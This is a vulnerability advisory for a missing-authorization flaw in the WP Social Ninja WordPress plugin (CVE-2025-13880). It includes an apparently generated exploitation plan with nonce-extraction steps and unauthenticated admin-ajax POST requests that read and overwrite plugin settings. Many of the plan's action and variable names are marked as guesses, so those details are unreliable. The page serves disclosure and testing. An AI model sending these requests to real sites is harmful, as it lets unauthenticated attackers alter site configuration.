WP Social Ninja - Embed Social Feeds, Customer Reviews, Chat Widgets (Google Reviews, YouTube Feed, Photo Feeds, and More) <= 4.0.1 - Missing Authorization to Unauthenticated Plugin's Settings Disclosure And Modification
Description
The WP Social Ninja – Embed Social Feeds, Customer Reviews, Chat Widgets (Google Reviews, YouTube Feed, Photo Feeds, and More) plugin for WordPress is vulnerable to unauthorized access and modification of data due to a missing capability check on the getAdvanceSettings and saveAdvanceSettings functions in all versions up to, and including, 4.0.1. This makes it possible for unauthenticated attackers to view and modify plugin's advanced settings.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:NTechnical Details
<=4.0.1Source Code
WordPress.org SVN# Research Plan: CVE-2025-13880 - WP Social Ninja Missing Authorization This plan outlines the steps to verify and exploit the missing authorization vulnerability in WP Social Ninja (versions <= 4.0.1) which allows unauthenticated disclosure and modification of advanced plugin settings. ## 1. Vuln…
Show full research plan
Research Plan: CVE-2025-13880 - WP Social Ninja Missing Authorization
This plan outlines the steps to verify and exploit the missing authorization vulnerability in WP Social Ninja (versions <= 4.0.1) which allows unauthenticated disclosure and modification of advanced plugin settings.
1. Vulnerability Summary
- Vulnerability: Missing Authorization (Capability Check).
- Affected Functions:
getAdvanceSettingsandsaveAdvanceSettings. - Nature of Flaw: The plugin registers AJAX or REST API endpoints for managing advanced settings but fails to verify that the requesting user has administrative privileges (e.g.,
manage_options). - Impact: An unauthenticated attacker can read sensitive configuration data and modify advanced settings, potentially leading to cross-site scripting (XSS) if the settings allow custom scripts/CSS, or breaking plugin functionality.
2. Attack Vector Analysis
- Endpoints: Likely
wp-admin/admin-ajax.phpor a REST API route underwp-json/wp-social-ninja/v1/. - AJAX Actions (Inferred):
wpsn_get_advanced_settings(or similar)wpsn_save_advanced_settings(or similar)
- Parameters:
action: The AJAX action string.nonce: A WordPress nonce for CSRF protection.settings: A JSON object or array containing the settings to be saved.
- Authentication: Unauthenticated (Access is available via
wp_ajax_nopriv_*hooks or REST routes with__return_truepermission callbacks).
3. Code Flow (Inferred)
- Entry Point: The plugin registers hooks during
initoradmin_init. - Registration:
// Likely pattern in affected versions add_action('wp_ajax_wpsn_get_advanced_settings', [$this, 'getAdvanceSettings']); add_action('wp_ajax_nopriv_wpsn_get_advanced_settings', [$this, 'getAdvanceSettings']); - Execution: The
getAdvanceSettingsfunction is called. It fetches settings usingget_option('wpsn_advanced_settings')(inferred) and returns them viawp_send_json_success(). - Vulnerability: The function lacks a
current_user_can('manage_options')check, and thenoprivhook makes it accessible to visitors.
4. Nonce Acquisition Strategy
WP Social Ninja typically localizes data for its React/Vue admin dashboard. We need to find where the nonce is exposed for unauthenticated users.
- Identify Script Localization: The plugin likely uses
wp_localize_script. - Setup:
- Create a page containing a Social Ninja feed to ensure the plugin's scripts are loaded.
wp post create --post_type=page --post_status=publish --post_title="Social Feed" --post_content='[wp_social_ninja id="ANY_ID"]'(Note: You may need to create a dummy feed first via CLI or find an existing shortcode).
- Extraction:
- Navigate to the page:
browser_navigate("http://localhost:8080/social-feed") - Search for the localization object in the browser console.
- Candidate Variable Name (Inferred):
window.wp_social_ninja_admin_dataorwindow.wpsn_config. - Command:
browser_eval("window.wp_social_ninja_admin_data?.nonce")
- Navigate to the page:
- Action Matching: Check if the nonce used for
getAdvanceSettingsis the same as the general plugin nonce (oftenwpsn_nonceorwp_social_ninja_nonce).
5. Exploitation Strategy
Phase 1: Information Disclosure (getAdvanceSettings)
HTTP Request:
- Method: POST
- URL:
http://localhost:8080/wp-admin/admin-ajax.php - Headers:
Content-Type: application/x-www-form-urlencoded - Body:
action=wpsn_get_advanced_settings&nonce=[EXTRACTED_NONCE](Note: Action name must be confirmed via grep).
Phase 2: Configuration Modification (saveAdvanceSettings)
HTTP Request:
- Method: POST
- URL:
http://localhost:8080/wp-admin/admin-ajax.php - Headers:
Content-Type: application/x-www-form-urlencoded - Body:
(Note: The exact structure of theaction=wpsn_save_advanced_settings&nonce=[EXTRACTED_NONCE]&settings[custom_css]=/*+Exploit+Successful+*/&settings[debug_mode]=truesettingsparameter must be determined by the output of Phase 1).
6. Test Data Setup
- Install Plugin: Ensure WP Social Ninja <= 4.0.1 is active.
- Enable Features: If the advanced settings menu is only available when certain modules are active, enable them:
wp option update wpsn_modules '{"reviews": "yes", "feeds": "yes"}' --format=json - Create Public Page: As described in Section 4, create a page with a plugin shortcode to trigger nonce localization.
7. Expected Results
- Disclosure: The
getAdvanceSettingsrequest should return a200 OKwith a JSON body containing the current plugin configuration. - Modification: The
saveAdvanceSettingsrequest should return{"success": true}. - Impact: Administrative settings will be updated without the attacker providing any login credentials.
8. Verification Steps
After performing the saveAdvanceSettings request, verify the change via WP-CLI:
# Check the specific option where settings are stored
wp option get wpsn_advanced_settings --format=json
Ensure that the values injected in the payload (e.g., debug_mode or custom_css) now reflect the attacker's input.
9. Alternative Approaches
If the vulnerability is via the REST API instead of AJAX:
- Find Routes:
grep -r "register_rest_route" . - Identify Controller: Look for
getAdvanceSettingswithin thepermission_callbackof the route definition. - Payload: Use the same logic but send a JSON POST request to
wp-json/wp-social-ninja/v1/settings/advanced. - Nonce: The REST API requires the
X-WP-Nonceheader for authenticated requests, but if the vulnerability is unauthenticated, it may not require a nonce at all if thepermission_callbackis__return_true.
Summary
The WP Social Ninja plugin for WordPress is vulnerable to unauthorized access and modification of its advanced settings due to a lack of capability checks in the getAdvanceSettings and saveAdvanceSettings functions. This vulnerability allows unauthenticated users to retrieve sensitive configuration data or change plugin settings by interacting with the exposed AJAX or REST API endpoints.
Exploit Outline
An attacker can exploit this vulnerability by identifying the AJAX or REST API actions associated with the plugin's advanced settings, such as 'wpsn_get_advanced_settings' and 'wpsn_save_advanced_settings'. By obtaining a security nonce from the public-facing side of the site—typically found in localized JavaScript variables like 'wp_social_ninja_admin_data'—the attacker can send unauthenticated POST requests to disclose or update plugin settings without requiring administrative privileges.
Check if your site is affected.
Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.